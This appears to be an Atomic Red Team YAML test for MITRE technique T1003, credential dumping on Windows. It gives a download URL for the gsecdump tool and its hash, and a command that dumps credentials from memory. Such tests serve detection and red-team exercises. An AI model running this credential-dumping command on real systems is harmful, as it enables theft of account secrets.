Hare Sudhan
28 lines
936 B
YAML
28 lines
936 B
YAML
attack_technique: T1003
|
|
display_name: OS Credential Dumping
|
|
atomic_tests:
|
|
- name: Gsecdump
|
|
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
|
|
description: |
|
|
Dump credentials from memory using Gsecdump.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
gsecdump_exe:
|
|
description: Path to the Gsecdump executable
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
|
|
gsecdump_bin_hash:
|
|
description: File hash of the Gsecdump binary file
|
|
type: string
|
|
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
|
|
gsecdump_url:
|
|
description: Path to download Gsecdump binary file
|
|
type: url
|
|
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
|
|
dependency_executor_name: powershell
|
|
executor:
|
|
command: |
|
|
"#{gsecdump_exe}" -a
|
|
name: command_prompt
|